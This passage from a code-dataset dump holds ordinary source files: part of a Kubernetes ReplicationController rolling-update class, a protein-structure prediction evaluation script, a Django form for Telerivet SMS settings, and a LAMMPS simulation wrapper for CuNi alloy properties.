------------------------------------------------------------------------------------- resize\n\n @staticmethod\n def resize(config=None, name=None, replicas=None):\n if name is None:\n raise SyntaxError('ReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if replicas is None:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] cannot be None.'.format(replicas))\n\n if not isinstance(name, str):\n raise SyntaxError('ReplicationController: name: [ {0} ] must be a string.'.format(name))\n\n if not isinstance(replicas, int) or replicas < 0:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] must be a positive integer.'.format(replicas))\n\n if config is not None and not isinstance(config, K8sConfig):\n raise SyntaxError('ReplicationController: config: [ {0} ] must be a K8sConfig'.format(config))\n\n current_rc = K8sReplicationController(config=config, name=name).get()\n current_rc.set_replicas(replicas)\n current_rc.update()\n current_rc.wait_for_replicas(replicas=replicas)\n\n return current_rc\n\n # ------------------------------------------------------------------------------------- rolling update\n\n @staticmethod\n def rolling_update(config=None, name=None, image=None, container_name=None, rc_new=None, wait_seconds=10):\n \"\"\"\n Performs a simple rolling update of a ReplicationController.\n\n See https://github.com/kubernetes/kubernetes/blob/release-1.0/docs/design/simple-rolling-update.md\n for algorithm details.\n\n :param config: An instance of K8sConfig. 
If omitted, reads from ~/.kube/config.\n :param name: The name of the ReplicationController we want to update.\n :param image: The updated image version we want applied.\n :param container_name: The name of the container we're targeting for the update.\n Required if more than one container is present.\n :param rc_new: An instance of K8sReplicationController with the new configuration to apply.\n Mutually exclusive with [image, container_name] if specified.\n :param wait_seconds:\n\n :return:\n \"\"\"\n\n if name is None:\n raise SyntaxError('K8sReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if image is None and rc_new is None:\n raise SyntaxError(\"K8sReplicationController: please specify either 'image' or 'rc_new'\")\n if name is not None and image is not None and rc_new is not None:\n raise SyntaxError('K8sReplicationController: rc_new is mutually exclusive with a [image, container_name] pair.')\n\n phase = 'init'\n ann_update_partner = 'update-partner'\n ann_desired_replicas = 'desired-replicas'\n\n name_next = \"{0}-next\".format(name)\n\n rc_current = None\n rc_next = None\n rc_current_exists = False\n rc_next_exists = False\n\n try:\n rc_current = K8sReplicationController(config=config, name=name).get()\n rc_current_exists = True\n except NotFoundException:\n pass\n\n try:\n rc_next = K8sReplicationController(config=config, name=name_next).get()\n rc_next_exists = True\n except NotFoundException:\n pass\n\n if not rc_current_exists and not rc_next_exists:\n raise NotFoundException('K8sReplicationController: rc: [ {0} ] does not exist.'.format(name))\n\n if rc_current_exists and not rc_next_exists:\n\n if rc_new is not None:\n rc_next = rc_new\n rc_next.add_annotation(k=ann_desired_replicas, v=str(rc_current.get_replicas()))\n\n else:\n rc_next = copy.deepcopy(rc_current)\n rc_next.add_annotation(k=ann_desired_replicas, v=str(rc_current.get_replicas()))\n\n if len(rc_next.model.pod_spec.containers) > 1 and not container_name:\n raise UnprocessableEntityException('K8sReplicationController: unable to determine on which container to perform a rolling_update; please specify the target container_name.')\n if len(rc_next.model.pod_spec.containers) == 1 and not container_name:\n container_name = rc_next.model.pod_spec.containers[0].model['name']\n\n rc_next.set_container_image(name=container_name, image=image)\n\n my_version = str(uuid.uuid4())\n\n rc_next.set_name(name=name_next)\n rc_next.add_pod_label(k='name', v=name)\n rc_next.add_pod_label(k='rc_version', v=my_version)\n rc_next.set_selector(dico=dict(name=name, rc_version=my_version))\n rc_next.set_replicas(replicas=0)\n rc_next.set_pod_generate_name(mode=True, name=name)\n rc_next.create()\n\n rc_current.add_annotation(k=ann_update_partner, v=name_next)\n rc_current.update()\n\n phase = 'rollout'\n\n elif rc_next_exists and not rc_current_exists:\n phase = 'rename'\n\n elif rc_current_exists and rc_next_exists:\n if not rc_next.get_annotation(k=ann_desired_replicas):\n rc_next.add_annotation(k=ann_desired_replicas, v=rc_current.get_replicas())\n rc_next.update()\n phase = 'rollout'\n\n if phase == 'rollout':\n desired_replicas = rc_next.get_annotation(k=ann_desired_replicas)\n\n while rc_next.get_replicas() < int(desired_replicas):\n\n next_replicas = rc_next.get_replicas() + 1\n rc_next.set_replicas(replicas=next_replicas)\n rc_next.update()\n rc_next.wait_for_replicas(replicas=next_replicas, labels=rc_next.get_pod_labels())\n time.sleep(wait_seconds)\n\n if rc_current.get_replicas() > 0:\n current_replicas = 
rc_current.get_replicas() - 1\n rc_current.set_replicas(replicas=current_replicas)\n rc_current.update()\n rc_current.wait_for_replicas(replicas=current_replicas, labels=rc_current.get_pod_labels())\n\n if rc_current.get_replicas() > 0:\n rc_current.set_replicas(replicas=0)\n rc_current.update()\n rc_current.wait_for_replicas(replicas=0, labels=rc_current.get_pod_labels())\n\n phase = 'rename'\n\n if phase == 'rename':\n rc_current.delete()\n rc_current = copy.deepcopy(rc_next)\n rc_current.set_name(name=name)\n rc_current.del_annotation(k=ann_update_partner)\n rc_current.del_annotation(k=ann_desired_replicas)\n rc_current.create()\n rc_next.delete()\n\n return rc_current\n","sub_path":"kubernetes/K8sReplicationController.py","file_name":"K8sReplicationController.py","file_ext":"py","file_size_in_byte":14666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633819053","text":"import argparse\r\nimport os\r\nimport numpy as np\r\nimport process\r\nimport geo\r\nimport pathlib\r\n\r\nROOT = '/home/eric/DeepPBS/data'\r\nOUT = '/share/Data/processed'\r\ndataset = 'test'\r\nPATH = os.path.join(ROOT, dataset)\r\npathlib.Path(PATH).mkdir(parents=True, exist_ok=True)\r\n\r\n\r\ndef run(filename):\r\n coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n with open(os.path.join(PATH, 'seq', '%s.txt' % filename)) as f:\r\n seq = f.read()\r\n\r\n comp_ary = process.ImageStrucRep(\r\n coo[1::4], seq, center='ca', multiview=True)\r\n np.save(os.path.join(OUT, dataset, 'comp_image_ca_multiview',\r\n filename + '.npy'), comp_ary)\r\n\r\n # knn = process.KNNStrucRep(coo[1::4], seq)\r\n # np.save(os.path.join(PATH, 'KNN', '%s.npy' % filename), knn)\r\n\r\n # tor = process.coo2tor(coo)\r\n # sincos = process.tor2sincos(tor)\r\n # np.save(os.path.join(PATH, 'tor', '%s.npy' % filename), sincos)\r\n\r\n # tor = np.load(os.path.join(PATH, 'tor', '%s.npy' % filename))\r\n # tor = process.sincos2tor(tor)\r\n # coo_ = process.tor2coo(tor, coo[1::4])\r\n # rmsd_n = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[::4][1:] - coo_[3::4]))))\r\n # rmsd_c = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[2::4][:-1] - coo_[1::4]))))\r\n # rmsd_o = np.sqrt(\r\n # np.mean(np.square(geo.get_len(coo[3::4][:-1] - coo_[2::4]))))\r\n # norm = 1 + np.log(np.sqrt(len(coo_[3::4]) / 100))\r\n # return np.array([rmsd_n, rmsd_c, rmsd_o])/norm\r\n\r\n\r\n# parser = argparse.ArgumentParser()\r\n# parser.add_argument('--multi_process', type=bool, default=False,\r\n# help='multi process or not')\r\n# parser.add_argument('--subset', type=int, default='0',\r\n# help='subset index')\r\n# parser.add_argument('--num_worker', type=int, default='0',\r\n# help='number of worker')\r\n# argparses = parser.parse_args()\r\n\r\n# if dataset == 'nr40':\r\n# with open(os.path.join(PATH, 'filenames.txt')) as f:\r\n# filenames = f.read().split('\\n')\r\n# elif dataset == 'test':\r\n# filenames = os.listdir(os.path.join(PATH, 'coo'))\r\n# filenames = [filename[:-4] for filename in filenames]\r\n\r\n\r\n# # def drop_done(filenames, path_done):\r\n# # filenames_done = os.listdir(path_done)\r\n# # for filename in filenames_done:\r\n# # filenames.remove(filename)\r\n# # return filenames\r\n\r\n# if argparses.multi_process:\r\n# subset_size = len(filenames) / argparses.num_worker\r\n# filenames = filenames[int(argparses.subset * subset_size):int((argparses.subset + 1) * subset_size)]\r\n\r\n# for filename in filenames:\r\n# run(filename)\r\n\r\n\r\n# nrmsds = []\r\n# for filename in 
filenames:\r\n# coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n# with open(os.path.join(PATH, 'seq', '%s.txt' % filename)) as f:\r\n# seq = f.read()\r\n# cb = np.load(os.path.join(PATH, 'cb', '%s.npy' % filename))\r\n\r\n# sincos_fuse = []\r\n# for i in range(10):\r\n# train_name = 'image_Conv-LSTM-Split_AdamWAmsgrad(lre3)_MSE_10fold_%s' % i\r\n\r\n# OUTPUT_PATH = './outputs/%s/test_output' % train_name\r\n# model_names = os.listdir(OUTPUT_PATH)\r\n\r\n# for model_name in model_names[:3]:\r\n# model_path = os.path.join(OUTPUT_PATH, model_name)\r\n# sincos_output = np.load(os.path.join(\r\n# model_path, '%s.npy' % filename))\r\n# sincos_fuse.append(sincos_output)\r\n\r\n# sincos_fuse = np.array(sincos_fuse)\r\n# sincos_fuse = np.mean(np.array(sincos_fuse), axis=0)\r\n# tor_fuse = process.sincos2tor(sincos_fuse)\r\n# nrmsd = process.tor2RMSD(coo, seq, cb, tor_fuse)\r\n\r\n# nrmsds.append(nrmsd)\r\n# nrmsds = np.array(nrmsds)\r\n# np.save('./outputs/%s_rmsd.npy' % train_name[:-2], nrmsds)\r\n\r\n\r\ndef examine_model(train_name, model_name, save=False):\r\n model_output_path = './outputs/%s/test_output/%s' % (\r\n train_name, model_name)\r\n rmsds = []\r\n gdts = []\r\n ramas = []\r\n\r\n filenames = os.listdir(model_output_path)\r\n for filename in filenames:\r\n filename = filename[:-4]\r\n coo = np.load(os.path.join(PATH, 'coo', '%s.npy' % filename))\r\n with open(os.path.join(PATH, 'seq', '%s.txt' % filename)) as f:\r\n seq = f.read()\r\n cb = np.load(os.path.join(PATH, 'cb', '%s.npy' % filename))\r\n\r\n out = np.load(os.path.join(model_output_path, '%s.npy' % filename))\r\n tor = process.sincos2tor(out)\r\n rmsd, gdt, rama = process.cal_criterias(coo, seq, cb, tor)\r\n\r\n rmsds.append(rmsd)\r\n gdts.append(gdt)\r\n ramas.append(rama)\r\n\r\n rmsds = np.array(rmsds)\r\n gdts = np.array(gdts)\r\n ramas = np.array(ramas)\r\n\r\n if save:\r\n np.save('./results/rmsd/%s_%s.npy' % (train_name, model_name), rmsds)\r\n np.save('./results/gdt/%s_%s.npy' % (train_name, model_name), gdts)\r\n np.save('./results/rama/%s_%s.npy' % (train_name, model_name), ramas)\r\n else:\r\n return rmsds, gdts, ramas\r\n\r\n\r\ndef examine_train(train_name, fuse_model=True, save=True, print_brief=True, multifold_fusing=False):\r\n train_output_path = './outputs/%s/test_output' % train_name\r\n model_names = os.listdir(train_output_path)\r\n\r\n if fuse_model:\r\n if 'fuse' not in model_names:\r\n model_paths = [os.path.join(train_output_path, model_name)\r\n for model_name in model_names]\r\n fused_outputs, filenames = process.fuse_output(model_paths)\r\n fused_path = os.path.join(train_output_path, 'fuse')\r\n pathlib.Path(fused_path).mkdir(parents=True, exist_ok=True)\r\n for output, filename in zip(fused_outputs, filenames):\r\n np.save(os.path.join(fused_path, filename), output)\r\n model_names += ['fuse']\r\n\r\n rmsds = []\r\n gdts = []\r\n ramas = []\r\n model_names.sort()\r\n for model_name in model_names:\r\n rmsd, gdt, rama = examine_model(train_name, model_name)\r\n\r\n rmsds.append(rmsd)\r\n gdts.append(gdt)\r\n ramas.append(rama)\r\n\r\n rmsds = np.array(rmsds)\r\n gdts = np.array(gdts)\r\n ramas = np.array(ramas)\r\n\r\n if print_brief:\r\n print(model_names)\r\n print(np.round(np.mean(rmsds, 1), 3))\r\n print(np.round(np.mean(np.mean(gdts, 1), -1), 3))\r\n print(np.round(np.mean(ramas, 1), 3))\r\n\r\n if save:\r\n np.save('./results/rmsd/%s.npy' % train_name, rmsds)\r\n np.save('./results/gdt/%s.npy' % train_name, gdts)\r\n np.save('./results/rama/%s.npy' % train_name, ramas)\r\n 
if multifold_fusing:\r\n global_output_paths = ['%s/test_output/%s' % (train_name, model_name)\r\n for model_name in model_names if model_name != 'fuse']\r\n return global_output_paths\r\n else:\r\n return rmsds, gdts, ramas\r\n\r\n\r\ndef examine_multifold_train(train_name, folds=10, multifold_fusing=True, save=True, print_brief=True):\r\n global_output_path = './outputs'\r\n\r\n if multifold_fusing:\r\n output_paths = []\r\n for i in range(folds):\r\n output_paths += examine_train('%s_%s' % (train_name, i),\r\n multifold_fusing=multifold_fusing, print_brief=False)\r\n\r\n model_paths = [os.path.join(global_output_path, output_path)\r\n for output_path in output_paths]\r\n fused_outputs, filenames = process.fuse_output(model_paths)\r\n fused_path = os.path.join(\r\n global_output_path, '%s/test_output/fuse' % train_name)\r\n pathlib.Path(fused_path).mkdir(parents=True, exist_ok=True)\r\n for output, filename in zip(fused_outputs, filenames):\r\n np.save(os.path.join(fused_path, filename), output)\r\n\r\n rmsd, gdt, rama = examine_model(train_name, 'fuse')\r\n\r\n if print_brief:\r\n print(np.round(np.mean(rmsd, 0), 3))\r\n print(np.round(np.mean(np.mean(gdt, 0), -1), 3))\r\n print(np.round(np.mean(rama, 0), 3))\r\n\r\n if save:\r\n np.save('./results/rmsd/%s_fuse.npy' % train_name, rmsd)\r\n np.save('./results/gdt/%s_fuse.npy' % train_name, gdt)\r\n np.save('./results/rama/%s_fuse.npy' % train_name, rama)\r\n else:\r\n return rmsd, gdt, rama\r\n else:\r\n for i in range(folds):\r\n examine_train('%s_%s' % (train_name, i))\r\n\r\n\r\nexam_name = str(input('exam_name='))\r\n# examine_multifold_train(exam_name)\r\nexamine_train(exam_name)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275516104","text":"from django.forms.fields import *\nfrom corehq.apps.sms.forms import BackendForm\nfrom dimagi.utils.django.fields import TrimmedCharField\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _, ugettext_noop\nfrom crispy_forms import layout as crispy\n\nclass TelerivetBackendForm(BackendForm):\n api_key = TrimmedCharField(\n label=ugettext_noop(\"API Key\"),\n )\n project_id = TrimmedCharField(\n label=ugettext_noop(\"Project ID\"),\n )\n phone_id = TrimmedCharField(\n label=ugettext_noop(\"Phone ID\"),\n )\n webhook_secret = TrimmedCharField(\n label=ugettext_noop(\"Webhook Secret\"),\n )\n\n @property\n def gateway_specific_fields(self):\n return crispy.Fieldset(\n _(\"Telerivet (Android) Settings\"),\n 'api_key',\n 'project_id',\n 'phone_id',\n 'webhook_secret',\n )\n\n def clean_webhook_secret(self):\n # Circular import\n from corehq.apps.telerivet.models import TelerivetBackend\n value = self.cleaned_data.get(\"webhook_secret\", None)\n backend = TelerivetBackend.by_webhook_secret(value)\n if backend is not None and backend._id != self._cchq_backend_id:\n raise ValidationError(_(\"Already in use.\"))\n return value\n\n","sub_path":"corehq/apps/telerivet/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355136765","text":"import utils\nfrom random import randint\nimport dataFileGenerator as dataF\nimport inFiles as inF\nimport pandas as pd\nfrom scipy.stats import linregress\nimport numpy as np\nimport os\nimport csv\nsh = os.system # I am running this on a bash terminal. 
If running in windows, you will have to rewrite any sh() calls to the correct strings.\n\n \nclass simulation():\n \"\"\"\n The simulation class is meant to hold all of the parameters one would vary across a lammps md simulation in the npt or nvt ensemble.\n It is also capable of running the simulations.\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [100,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [6,],temperatures = [300,],pressures = [0,],lengths = [6*3.63,],concPercents = [30,],timeStep = 0.0001,simType = \"npt\",fileName = \"CuNi\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.Template\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n self.logFile = logFile\n return \n\n def setSimParams(self,lib = \"\",lammps = \"\",alloy = \"\",latticeConst = 0.0,latticeType = \"\",numAtomTypes = 0,runTimes = [],systemSizes = [],temperatures = [],pressures = [],lengths = [],concPercents = [],timeStep = 0.0,simType = \"\",fileName = \"\", potentialFile = \"\",inTemplate = \"\",copyDir = \"\",logFile = \"\"):\n \"\"\"\n Change any of the initial parameters. Any unspecified parameters are left unchanged.\n \"\"\"\n if lib:\n self.lib = lib\n if lammps:\n self.lammps = lammps\n if alloy:\n self.alloy = alloy\n if latticeConst:\n self.latticeConst = latticeConst\n if latticeType:\n self.latticeType = latticeType\n if numAtomTypes:\n self.numAtomTypes = numAtomTypes\n if any(runTimes):\n self.runTimes = runTimes\n if any(systemSizes):\n self.systemSizes = systemSizes\n if any(temperatures):\n self.temperatures = temperatures\n if any(pressures):\n self.pressures = pressures\n if any(lengths):\n self.lengths = lengths\n if any(concPercents):\n self.concPercents = concPercents\n if timeStep:\n self.timeStep = timeStep\n if simType:\n self.simType = simType\n if inTemplate:\n self.inTemplate = inTemplate\n if fileName:\n self.fileName = fileName\n if potentialFile:\n self.potentialFile = potentialFile\n if copyDir:\n self.copyDir = copyDir\n if logFile:\n self.logFile = logFile\n return \n\n\n\n\n\n def cpTemplate(self,wd):\n \"\"\"\n This function copies all of the files in copyDir to the working directory.\n \"\"\"\n sh(\"cp \" + self.copyDir + \"/* \" + wd)\n return \n \n \n def inFile(self):\n \"\"\"\n Returns the name of the lammps in file to be created and used in the simulations.\n \"\"\"\n return \"in.\" + self.fileName\n\n def dataFile(self):\n \"\"\"\n Returns the name of the atom data file to be created and used in the simulations.\n \"\"\"\n return \"data.\" + self.fileName\n\n def pythonLib(self):\n \"\"\"\n Returns the path to the python library.\n \"\"\"\n return self.lib+\"/PyScripts\"\n\n def awkLib(self): \n \"\"\"\n awk is a Linux tool for quick file reading and editing. It is used to make lammps output more easily readable. 
\n See cleanOutput for more about specific awk files used.\n \"\"\"\n return self.lib+\"/AwkFiles\"\n\n def runLammps(self):\n \"\"\"\n Command line call to run lammps.\n \"\"\"\n sh(self.lammps + \" \" + self.inFile())\n return \n\n\n\n\n\n\nclass GrainBdry(simulation):\n \"\"\"\n This class is meant to run simulations to get the energy due to an interface between two misaligned crystal structures for a range of temperatures and concentrations of CuNi\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [10,],alloy = \"custom\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in range(100,2501,100)],pressures = [0,],lengths = [],concPercents = [x for x in range(0,101,10)],orientations = [[1,0,0,0,1,0,0,0,1],],timeStep = 0.0005,simType = \"\",fileName = \"grainBdry\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.grainBdryTemplate\",copyDir = \"./In\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.orientations = orientations\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n def setOrientations(self,orientations):\n self.orientations = orientations\n return\n\n \n\n def getWorkDir(self,time,size,temp,press,concPercent,orientation):\n \"\"\"\n This function returns the path to the directory in which a simulation will be run.\n \"\"\"\n o = orientation\n orientStr = \"%d%d%d-%d%d%d-%d%d%d\" %(o[0],o[1],o[2],o[3],o[4],o[5],o[6],o[7],o[8])\n return \"Out/RunTime\" + str(int(time)) + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(concPercent)) + \"Press\" + str(int(press)) + \"Orient\" + orientStr\n\n def runGBSims(self):\n cwd = os.getcwd()\n sh(\"mkdir Out\")\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for press in self.pressures:\n for conc in self.concPercents:\n for orient in self.orientations:\n wd = self.getWorkDir(time,size,temp,press,conc,orient)\n sh(\"mkdir \" + wd)\n self.cpTemplate(wd)\n os.chdir(wd)\n nums = [3,1,2]\n lets = [\"x\",\"y\",\"z\"]\n o = [\"%s%d equal %d\" %(lets[i//3],nums[(i+1)%3],orient[i]) for i in range(9)]\n inFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),\"PRESSURE equal \" + str(press),\"RANDOM equal \" + str(randint(1000000,99999999)),\"CONC equal \" + str(conc),\"A equal \" + str(self.latticeConst),\"SYSTEMSIZE equal \" + str(size)] + o)\n self.runLammps()\n os.chdir(cwd)\n return\n\n def dataFile(self): # This override the simulation method becasue the grainbdry sim does not use a data file\n return\n\n\n\n\nclass elastic(simulation):\n \"\"\"\n This class is meant to run simulations to get the elastic constants over a range of temperatures and \n concentrations\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [1,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in 
range(100,2501,100)],pressures = [],lengths = [],concPercents = [x for x in range(0,101,10)],timeStep = 0.0005,simType = \"\",fileName = \"elastic\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.elasticTemplate\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.logFile = logFile\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n\n def getWorkDir(self,time,size,temp,concPercent):\n \"\"\"\n This function returns the path to the directory in which a simulation will be run.\n \"\"\"\n return \"Out/RunTime\" + str(int(time)) + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(concPercent))\n\n\n\n def runElasticSims(self):\n cwd = os.getcwd()\n sh(\"mkdir Out\")\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for conc in self.concPercents:\n wd = self.getWorkDir(time,size,temp,conc)\n sh(\"mkdir \" + wd)\n self.cpTemplate(wd)\n os.chdir(wd)\n inFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),\"RANDOM equal \" + str(randint(1000000,99999999))])\n dataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes = self.numAtomTypes, alloyCompPercent = conc)\n dataFile.createDataFile()\n self.runLammps()\n os.chdir(cwd)\n return\n\n\n \n def getElasticConsts(self):\n f = open(self.logFile)\n searchline = \"print \\\"Bulk Modulus = $(v_bulkmodulus) +/- $(v_dbulkmodulus) ${cunits}\\\"\\n\"\n N = -1\n start = False\n values = []\n errors = []\n for line in f:\n if line == searchline:\n N = 1\n if ((N+1)%2):\n sline = line.split()\n if sline[0] == \"Total\":\n pass\n else:\n for i in range(len(sline)):\n if sline[i] == \"=\":\n x = float(sline[i+1])\n elif sline[i] == \"+/-\":\n y = float(sline[i+1])\n values.append(x)\n errors.append(y)\n if N > 0:\n N += 1\n f.close()\n return values,errors\n \n\n\n\n def getElasticData(self):\n cwd = os.getcwd()\n header = [\"Run Time (ps)\",\"N Atoms\",\"Temperature (K)\",\"Concentration of Cu\",\"Bulk Mod (GPa)\",\"Shear Mod Aniso (GPa)\",\"Shear Mod Iso (GPa)\",\"Poisson\",\"Youngs\",\"Lames\",\"P-Wave\",\"Bulk Mod Error\",\"Shear Mod Aniso Error\",\"Shear Mod Iso Error\",\"Poisson Error\",\"Youngs Error\",\"Lames Error\",\"P-Wave Error\"]\n data = []\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for conc in self.concPercents:\n try:\n d = [time,4*size**3,temp,conc]\n wd = self.getWorkDir(time,size,temp,conc)\n os.chdir(wd)\n temporary=open(self.logFile)\n temporary.close()\n v,e = self.getElasticConsts()\n data.append(d + v + e)\n except:\n pass\n os.chdir(cwd)\n return data, header \n\n
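\n# Editor's note: a hedged sketch, not part of the original module. It mirrors the log scraping done in elastic.getElasticConsts above, which walks lines of the form \"<name> = <value> +/- <error> <units>\" (the sample line below is made up) and pairs each value with its uncertainty.\ndef parseConstLine(line):\n \"\"\"Parse e.g. \"Bulk Modulus = 140.2 +/- 1.3 GPa\" into (140.2, 1.3).\"\"\"\n sline = line.split()\n value = float(sline[sline.index(\"=\") + 1])\n error = float(sline[sline.index(\"+/-\") + 1])\n return value, error\n\n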
class bulkProp(simulation):\n \"\"\"\n This class allows one to run simulations in NVT or NPT to compute the bulk properties of a material.\n \"\"\"\n def __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [1,],alloy = \"CuNi\",latticeConst = 3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [14,],temperatures = [1,]+[x for x in range(100,2501,100)],pressures = [0,],lengths = [14*3.6,],concPercents = [x for x in range(0,101,10)],timeStep = 0.0005,simType = \"\",fileName = \"bulk\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.elasticTemplate\",copyDir = \"./In\",logFile = \"log.run\"):\n self.lib = lib \n self.lammps = lammps\n self.runTimes = runTimes\n self.alloy = alloy\n self.latticeConst = latticeConst\n self.latticeType = latticeType\n self.numAtomTypes = numAtomTypes\n self.systemSizes = systemSizes\n self.temperatures = temperatures\n self.pressures = pressures\n self.lengths = lengths\n self.concPercents = concPercents\n self.timeStep = timeStep\n self.simType = simType\n self.fileName = fileName\n self.logFile = logFile\n self.potentialFile = potentialFile\n self.inTemplate = inTemplate\n self.copyDir = copyDir\n return \n\n\n def setBulkMod(self,latticeConst = \"\"):\n \"\"\"\n Automatically set the simulation parameters to compute the bulk modulus given a lattice spacing.\n \"\"\"\n if latticeConst:\n self.latticeConst = latticeConst\n self.lengths = [x/1000*self.latticeConst for x in range(995,1006)]\n self.temperatures = [1,] + [x for x in range(100,2501,100)]\n self.concPercents = [x for x in range(0,100,10)]\n self.runTimes = [10,] # 10 ps chosen arbitrarily\n self.systemSizes = [10,] #4000 atoms chosen arbitrarily\n self.fileName = \"BulkMod\"\n self.inTemplate = \"in.BulkMod\"\n return\n\n def setHeatCap(self):\n \"\"\"\n Automatically set the simulation parameters to compute the heat capacity.\n \"\"\"\n return\n\n def setThermExp(self):\n \"\"\"\n Automatically set the simulation parameters to compute the thermal expansion coefficient.\n \"\"\"\n return\n \n
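 # Editor's note (hedged): setBulkMod above samples box lengths within +/-0.5% of the equilibrium lattice constant so that the bulk modulus can be estimated from the P(V) curve as B = -V*dP/dV; calcBulkModT further down applies exactly that formula to the forward-difference slope returned by getForwDif.\n\n 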
def getWorkDir(self,time,size,temp,pv,concPercent):\n \"\"\"\n This function writes the name of the directory in which the simulation will be run and output.\n The naming is a matter of preference and can be changed.\n \"\"\"\n if self.simType == \"npt\":\n return \"Out/RunTime\"+str(time)+\"Size\"+str(size)+\"Conc\"+str(concPercent)+\"Temp\"+str(temp)+\"Press\"+str(round(pv,2))\n elif self.simType == \"nvt\":\n return \"Out/RunTime\"+str(time)+\"Size\"+str(size)+\"Conc\"+str(concPercent)+\"Temp\"+str(temp)+\"Length\"+str(round(pv,2))\n else:\n print(\"Unknown sim type.\")\n return \n \n\n\n def getVolOrPress(self):\n \"\"\"\n Returns either the list of lengths or pressures depending on the simulation type.\n \"\"\"\n if self.simType == \"npt\":\n return self.pressures,\"PRESSURE\"\n elif self.simType == \"nvt\":\n return self.lengths,\"LENGTH\"\n else:\n print(\"Unknown simulation type\")\n return\n\n def runBulkSims(self):\n \"\"\"\n This method runs the lammps simulations over the range of parameters specified in the object.\n \"\"\"\n volOrPress,varString = self.getVolOrPress()\n cwd = os.getcwd()\n sh(\"mkdir Out\") # Where the simulation directories will be stored for organizational purposes.\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n sh(\"mkdir \" + wd) \n self.cpTemplate(wd)\n os.chdir(wd)\n # write the input file and the data file\n inFile = inF.inFile(fileName = self.fileName, readFile = self.inTemplate,runTime = time,timeStep = self.timeStep)\n inFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp),varString + \" equal \" +str(var),\"RANDOM equal \" + str(randint(1000000,9999999))])\n dataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes = self.numAtomTypes, alloyCompPercent = concPercent)\n dataFile.createDataFile()\n self.runLammps()\n os.chdir(cwd)\n return \n \n\n## def cleanOutput(self):\n## \"\"\"\n## This function cleans up lammps output files so that they can be read by a read csv function and jmol.\n## 